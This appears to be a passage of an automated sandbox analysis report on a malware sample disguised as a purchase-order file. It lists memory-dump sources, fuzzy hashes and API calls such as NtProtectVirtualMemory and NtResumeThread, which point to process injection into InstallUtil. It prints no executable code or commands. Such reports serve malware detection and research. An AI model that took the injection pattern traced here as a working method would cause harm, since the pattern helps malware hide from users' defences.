                                                          • Opcode Fuzzy Hash: 1e740d6408295f109730e1f41061cd56f93a4394a2c9a1b6291a594f1bd4f1a9
                                                          • Instruction Fuzzy Hash: 0621D6B1E056188BEB68CF6B89406DDFAF7AFCD300F04C0AAD808AA255DB700A45CF44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                          • API String ID: 0-463314800
                                                          • Opcode ID: f9770681cc7939ccc1811f4beb939a7049a30199d23f65ec48d2b71bd0f495ec
                                                          • Instruction ID: 1e619fcbc4a99b86cb56de888258f18bb00a9ddd98de7811f22809b181d693f0
                                                          • Opcode Fuzzy Hash: f9770681cc7939ccc1811f4beb939a7049a30199d23f65ec48d2b71bd0f495ec
                                                          • Instruction Fuzzy Hash: 9E51B130A402058FC758DF6DD950BAFBBEBEFC8300F148928D4499B296DE799906C7A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: '$($/$0M
                                                          • API String ID: 0-3743881453
                                                          • Opcode ID: ceb32563d83f7fa867516ca2ddd530f41b064517c95a27703f3221a0290d03a2
                                                          • Instruction ID: 97c79481ec6e5481ff50f53fb9f7b24f6ae332425518273224da9f5bb6b28a0f
                                                          • Opcode Fuzzy Hash: ceb32563d83f7fa867516ca2ddd530f41b064517c95a27703f3221a0290d03a2
                                                          • Instruction Fuzzy Hash: 8131ADB4D15228CFDBA4EF64D888BACB7B1BB59308F5041A9E649A7280CB740E84CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$0M$P$^
                                                          • API String ID: 0-2812019657
                                                          • Opcode ID: 8b34d0044479288d3c0d560ddba8a41cf863064769e113b18240d4d73de8eb1a
                                                          • Instruction ID: 066c8b76f5ee212c716c8f8aa398725fd9a5431eea755d45fe8c78cc88d5ae40
                                                          • Opcode Fuzzy Hash: 8b34d0044479288d3c0d560ddba8a41cf863064769e113b18240d4d73de8eb1a
                                                          • Instruction Fuzzy Hash: 9A212A70A15268CFDBA4EF64D954BDDB7B5FB49308F4080AAE90AA7744CB305E84CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          • Opcode ID: 042d76eeb96103a45e8785f246d1c9a6c0ea86695c2bafdaf106f8db20e1267c
                                                          • Instruction ID: e3a2a1ca51241fded1d19cb57f80d9ac65b43c1c0d21008efd52f7beadd5e92b
                                                          • Opcode Fuzzy Hash: 042d76eeb96103a45e8785f246d1c9a6c0ea86695c2bafdaf106f8db20e1267c
                                                          • Instruction Fuzzy Hash: 97918034A45104CFD704DF69E58CBA9BBF2FF89316F25A4A8E406AB365CB309C85CB10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          • Opcode ID: bae468a3732b62f9a64c0ebec4a290410ba951d88cf569f2455018792784e1ef
                                                          • Instruction ID: 1b5566afa91760cbf1c7fde32fb66fc2e08f712be6085164dfd2a7b58060e98f
                                                          • Opcode Fuzzy Hash: bae468a3732b62f9a64c0ebec4a290410ba951d88cf569f2455018792784e1ef
                                                          • Instruction Fuzzy Hash: 10817034A45104CFD704DF65E58CBA9BBF2FF88316F25A4A8E406AB365CB309C85CB10
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e32888463e94c654082c36e645e1d46b631805ec925210d05fcc708f612f4edd
                                                          • Instruction ID: eb92095ef48d61b2df378ec6175289eb1a4375e047e6befe637868e6f7882596
                                                          • Opcode Fuzzy Hash: e32888463e94c654082c36e645e1d46b631805ec925210d05fcc708f612f4edd
                                                          • Instruction Fuzzy Hash: AB31E1347482059FD705DB39D898B6A7BE6EFC4360F2491BAE405DB3A8DA34DC45CB20
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 066cbd9848af9c283083d87ed5f70d7c2efaeb8df53a62a6afe3587da1ea1851
                                                          • Instruction ID: 559780ad3c3cbec7e789199a78899046edddf2fc16eb7396042d0f668b694fff
                                                          • Opcode Fuzzy Hash: 066cbd9848af9c283083d87ed5f70d7c2efaeb8df53a62a6afe3587da1ea1851
                                                          • Instruction Fuzzy Hash: AE11F574D04248EFCB44EFA9D54969CBFF1EF46304F2094EAD008AB265D7345A84DB51
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466682412.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d9d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b7f67ce9140fae53e50877adf0ca0a41cf5deb9bab109854466ac6741d817dd
                                                          • Instruction ID: 503a4a7181e3e3856b56afc0f0796ac5dad05f60c3077f1628d9968a369834c9
                                                          • Opcode Fuzzy Hash: 5b7f67ce9140fae53e50877adf0ca0a41cf5deb9bab109854466ac6741d817dd
                                                          • Instruction Fuzzy Hash: AF01F7310053049ADB209A1ACC84B66FF9CEF45364F2CC42AED480B287C239D844C6B1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4995afd3d960d614bc42ba05ddc2530719bb17661cfec668f89bf9b0ed6892cf
                                                          • Instruction ID: fedf262aa771e3717f819f34dd460214d54a0f0ab1a4874245bc6e2b6b29bdc7
                                                          • Opcode Fuzzy Hash: 4995afd3d960d614bc42ba05ddc2530719bb17661cfec668f89bf9b0ed6892cf
                                                          • Instruction Fuzzy Hash: 23013C3150D3949FC3425B5998293417FB4EF8B325B0554E7D484EF2A3CA659C05DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 721603811d610a870ca37634bcb61bd1d890a2345abe202326ab36bcde6e6ce9
                                                          • Instruction ID: d490b3d6d5755f2c337363e5d7a069e9706938907d5737324816e2ffce3a4e2d
                                                          • Opcode Fuzzy Hash: 721603811d610a870ca37634bcb61bd1d890a2345abe202326ab36bcde6e6ce9
                                                          • Instruction Fuzzy Hash: D1110570D04208EFCB44EFA9E5896ACBFF1EB45304F2094F9D008AB254D7745A85CB45
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466682412.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d9d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 367c6e885b607ad98e907f09336e92caa5dbc51207421081fe022397c638a2c2
                                                          • Instruction ID: 9c43728168ed3ec5d278c5aa16cf1f4779f68daa62ed829070a00fabd4279977
                                                          • Opcode Fuzzy Hash: 367c6e885b607ad98e907f09336e92caa5dbc51207421081fe022397c638a2c2
                                                          • Instruction Fuzzy Hash: 93F09671404344DEEB208E1ADC84B66FFA8EF55774F18C55AED484B297C3799C44CAB1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6f7c0a86f74b419efce51fae9c1e85b6a205e4a54528979d1ad9de328c65dc9
                                                          • Instruction ID: 4efd3dd5aa6bec7273aa7ba954d80bc356ec9491ba9218686f6eb2df61c41b35
                                                          • Opcode Fuzzy Hash: f6f7c0a86f74b419efce51fae9c1e85b6a205e4a54528979d1ad9de328c65dc9
                                                          • Instruction Fuzzy Hash: 74D0C9700087489FC3461BE9AD086493B7CEE4B22434480E2E485CA133CA2018049B31
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfe9a143dc4dacd5b595c2dca27bf7114d6ebad4dba2bcbc67cdc8a4ff64cfd6
                                                          • Instruction ID: 9adb12de19f0d646cf2a67c00254670cbb08e44aaee1b1564ab425a9630c3293
                                                          • Opcode Fuzzy Hash: bfe9a143dc4dacd5b595c2dca27bf7114d6ebad4dba2bcbc67cdc8a4ff64cfd6
                                                          • Instruction Fuzzy Hash: 33C08C20E003A49FEF046BB4B50D32D3F81EB93319F88489CC0819B3A7CAA51C88C731
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcb0c95a904701a8fcaefc87b9fe6c972f7aa576119c4b2baff155398bbff4e8
                                                          • Instruction ID: 909a7828b4e27001756169d2abd56ab6fca6adbcb89c8269712838fb75d52256
                                                          • Opcode Fuzzy Hash: fcb0c95a904701a8fcaefc87b9fe6c972f7aa576119c4b2baff155398bbff4e8
                                                          • Instruction Fuzzy Hash: 7AC01230A00104ABCF055B94EC045AD7AB2DF49300F205014F501723A0C9225C009B34
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a5aa096f45c276098947e8d4dc226c008280ed0fdde425d646e14ecde4c7209
                                                          • Instruction ID: 8d53ba7907df301981fc4e591e1372ef741917225c1ca631d1697ec53b24db66
                                                          • Opcode Fuzzy Hash: 6a5aa096f45c276098947e8d4dc226c008280ed0fdde425d646e14ecde4c7209
                                                          • Instruction Fuzzy Hash: ACA01132000B08CB82002BA0BC0C20CBB2CEA0A202B808020E00EC022BCA2028008AA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4466976613.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_e30000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b17623d59e1ef846e2798f00d89c431f83be160e8bb138a14238a2c528b6cecb
                                                          • Instruction ID: f64f04f0abc94843ea326e81d93807430f85dc9d4e31882bdafc9bd708f52f15
                                                          • Opcode Fuzzy Hash: b17623d59e1ef846e2798f00d89c431f83be160e8bb138a14238a2c528b6cecb
                                                          • Instruction Fuzzy Hash: F790023104570CCB454027D57C49555F75C95C55357809051A50D816129EA5641085A5

                                                          Execution Graph

                                                          Execution Coverage:11.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:232
                                                          Total number of Limit Nodes:9

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$8
                                                          • API String ID: 0-3186246319
                                                          • Opcode ID: 052ee01af4275cbcb90d6eebfab036063856676a89c5b89711c53d331a1cd53d
                                                          • Instruction ID: 4a801d5e73006a26f14d602fb3000ce2dbd7e9b4dc73375e0e94ea550e006a69
                                                          • Opcode Fuzzy Hash: 052ee01af4275cbcb90d6eebfab036063856676a89c5b89711c53d331a1cd53d
                                                          • Instruction Fuzzy Hash: 8D52D775E012298FDBA4DF69C850AD9B7B2FF89310F1085AAD909B7344DB34AE85CF50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$h
                                                          • API String ID: 0-3598783323
                                                          • Opcode ID: 12f019d668fbd2f7b9b792aa4243eb225a714a7c6c923ae5574678776d41506a
                                                          • Instruction ID: ae8f30da0cb018ba9e78d7cdbdf2d027b10714db3b8eb83a17671b3bd5a07e0e
                                                          • Opcode Fuzzy Hash: 12f019d668fbd2f7b9b792aa4243eb225a714a7c6c923ae5574678776d41506a
                                                          • Instruction Fuzzy Hash: 4381F675D012198FEB54DF69C840AD9BBB6FF89304F1082AAD509A7250DB345E85CFA1
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: b45ef3363c5b56d53dc05c6b212c8520eae8ea28a75795ddf7f11daa8713b2c0
                                                          • Instruction ID: f332ff6f67d4a1e5dbc716caaa3ebc61211581a09fcc116232b0dc19e4d97f64
                                                          • Opcode Fuzzy Hash: b45ef3363c5b56d53dc05c6b212c8520eae8ea28a75795ddf7f11daa8713b2c0
                                                          • Instruction Fuzzy Hash: 8221F4B1D012499FCB10DFAAD984ADEFBF9FF48310F20842AE519A7350C775A940CBA5
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: e257c4caf7a6dde1b36eeebe4290a36ba37d284bd04e7f0c2b56447c66af04cd
                                                          • Instruction ID: 6b768882051e05fe25f41939c12ff230a5d55e6088c3f69b138b0475492dadbd
                                                          • Opcode Fuzzy Hash: e257c4caf7a6dde1b36eeebe4290a36ba37d284bd04e7f0c2b56447c66af04cd
                                                          • Instruction Fuzzy Hash: 7A21D2B1D012499FCB10DFAAD984AEEFBF5FF48310F20842AE519A7250C775A944CBA5
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 06E93246
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e02e487acc0a50dd8b991c1298467b5eea2ff6dd9313f4c62ecf7a7809fcbac5
                                                          • Instruction ID: 76309b3caf2ba1c8f827c7aab713a61d2bc43819a13662157fac7a2c373a9221
                                                          • Opcode Fuzzy Hash: e02e487acc0a50dd8b991c1298467b5eea2ff6dd9313f4c62ecf7a7809fcbac5
                                                          • Instruction Fuzzy Hash: B41138B1D003088ECB10DFAAC485AEFFBF5EF48324F10842AD419A7640CB799944CFA1
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 06E93246
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 9a65e7142fffc465563fbfdd376e83b88a23d2247b9e8b70f4934b6f7480d5b1
                                                          • Instruction ID: 44f15c8ba66faad1790e1ac57328940c03ae1426894674b29e008a940807f74a
                                                          • Opcode Fuzzy Hash: 9a65e7142fffc465563fbfdd376e83b88a23d2247b9e8b70f4934b6f7480d5b1
                                                          • Instruction Fuzzy Hash: C11126B1D003488FCB10DFAAC484AAEFBF4FF88314F10842AD419A7240DB78A944CFA5
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CDFF49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385524832.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6cd0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 5b73f27e1de830b977d40d8a49d61eb3b59083c0cacecca460d8bbaa0eba121f
                                                          • Instruction ID: 4c9ccaa198f21dfe21da39d537dbf3823da4eb1fe7b7291de90c792a4107e6ce
                                                          • Opcode Fuzzy Hash: 5b73f27e1de830b977d40d8a49d61eb3b59083c0cacecca460d8bbaa0eba121f
                                                          • Instruction Fuzzy Hash: C70149314013044FC761EBA9EC143DEBBF4AF86310F14845DD15A972A1CA799C44D7B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 47644f89ea57a8adc154dece7b3a7e171c7743efc64a654256ad83ffa03c1aaa
                                                          • Instruction ID: 34f8c613bba7a7d6bd86793af87d6adbe198c03fe9a8c9fae9eb942de6ac8073
                                                          • Opcode Fuzzy Hash: 47644f89ea57a8adc154dece7b3a7e171c7743efc64a654256ad83ffa03c1aaa
                                                          • Instruction Fuzzy Hash: 5BB1F774E01218CFDB94CF69D484BADBBF2FB89304F1088A9D409A7255EB749D85CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 750f65389f1090bf63cd3d51c184b729ae10a0d83e386d3d05d9f3200d8ac9a7
                                                          • Instruction ID: b8b207fe6ddd2b3610530ccadf5d17b4e387352a4d25849e195066fc4041fcc9
                                                          • Opcode Fuzzy Hash: 750f65389f1090bf63cd3d51c184b729ae10a0d83e386d3d05d9f3200d8ac9a7
                                                          • Instruction Fuzzy Hash: 1AB10574E01218CFDB94CFA9D484B9DBBF2FB89300F1084A9D409A7265EB749D85CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: J
                                                          • API String ID: 0-1141589763
                                                          • Opcode ID: ff530946c5ad77d66bf712610fcf5ac378eaad7a61a37e1f9f4e6533e0a5e7a4
                                                          • Instruction ID: 7da49d863f14a14359c4ca5fd229442d1c7be9de3a6c2ba62acc226d319c4fb2
                                                          • Opcode Fuzzy Hash: ff530946c5ad77d66bf712610fcf5ac378eaad7a61a37e1f9f4e6533e0a5e7a4
                                                          • Instruction Fuzzy Hash: C0318AB1D156288BEB59CF6BDC4069DFAFBBFC8204F04D1AAD90CA6254DB700B818F45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PZT
                                                          • API String ID: 0-3004033766
                                                          • Opcode ID: 4fec116304b5d8f3510152c703aca6c52fdc574147b24ea3fce4ae8700d53935
                                                          • Instruction ID: 63f54c04f94b7237be1dc608a731bf08bab5f6ee2b1369e87a670fb3d57589ea
                                                          • Opcode Fuzzy Hash: 4fec116304b5d8f3510152c703aca6c52fdc574147b24ea3fce4ae8700d53935
                                                          • Instruction Fuzzy Hash: 48310C74A01214DFEB54CF29D855B99B7F6FB49300F1085EAD90AA7391DB399D88CF04
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 101ff08c39cecc665d8ae3b186bc659329b156294bccd59027e583b0895b1abc
                                                          • Instruction ID: a5cfe16379a820415e1f81e9dfad55b2688050e915b4eb7a9b1719782c7dad9c
                                                          • Opcode Fuzzy Hash: 101ff08c39cecc665d8ae3b186bc659329b156294bccd59027e583b0895b1abc
                                                          • Instruction Fuzzy Hash: 5C51A070D4522CCBEB24CF69CD84B99B7B5BB49304F14C6E9D40AA3251DB309AC6CF51
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85cb860a88589cf5bbc434cd37a57a54bdbf90957fc213e433d31cef04594615
                                                          • Instruction ID: 8f7771ec4417c5eb3743d7f868756f4ea59405620202908fbf58a8f3f13d68fe
                                                          • Opcode Fuzzy Hash: 85cb860a88589cf5bbc434cd37a57a54bdbf90957fc213e433d31cef04594615
                                                          • Instruction Fuzzy Hash: 1F51B270D4122CCBEB24CF69CD80B99B7B5BB49304F14C6E6D40AA3251DB309AC6CF51

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>$D
                                                          • API String ID: 0-588199494
                                                          • Opcode ID: f79ab0e9a46052eba6f0ab987cec940d7e86b572dbcb4938a0116be5cbc125a6
                                                          • Instruction ID: 3d6fb3d3f58b646f243f89482afdd5dcaac049068a812b436748ba387a8a66b9
                                                          • Opcode Fuzzy Hash: f79ab0e9a46052eba6f0ab987cec940d7e86b572dbcb4938a0116be5cbc125a6
                                                          • Instruction Fuzzy Hash: 4F419074A41258CFEBA4CF58C888B9DBBB2BB89304F1484AAD509B7340D7395EC9CF10

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: +$2$6
                                                          • API String ID: 0-1188992160
                                                          • Opcode ID: 015294ecbc0eadca5ca209e8ce32c6ebe26ffbf812ccc4217fb773028f867129
                                                          • Instruction ID: 6bcf044fa6790f0289b3eaa6185d968ad576213825584a8eba98a9853c09d180
                                                          • Opcode Fuzzy Hash: 015294ecbc0eadca5ca209e8ce32c6ebe26ffbf812ccc4217fb773028f867129
                                                          • Instruction Fuzzy Hash: 5331D274985258CFDBA0CF54C888B9DBBB2BB4A344F1894EAD409B7250C7355EC5CF24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 6b1fc3570077271029cebc54a0cbc645f45e3367b24b6aedc3cc938401d00175
                                                          • Instruction ID: b8aa948e3f8ef6957d392d7857c5488d40a70272b319cfaed62c7229eeb5616e
                                                          • Opcode Fuzzy Hash: 6b1fc3570077271029cebc54a0cbc645f45e3367b24b6aedc3cc938401d00175
                                                          • Instruction Fuzzy Hash: 3A421774E10209DFDF94DBE9D45CAADB7B6FF49311F108019D952AB254C738AA42CFA0

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 9bc4abe822e4b85b9849e3ecd06453eae7da7ce909b9a0e85aefbf2d8efa0fbf
                                                          • Instruction ID: 003e92a2112c8ce7ba62259b3d5c97a5bf5d39f8dd63b65f027297c481eb5228
                                                          • Opcode Fuzzy Hash: 9bc4abe822e4b85b9849e3ecd06453eae7da7ce909b9a0e85aefbf2d8efa0fbf
                                                          • Instruction Fuzzy Hash: 3BF1B774D11208EFDF54DFA5E4986ACBBB2FF49325F604069E446AB350CB396A82CF50

                                                          Control-flow Graph

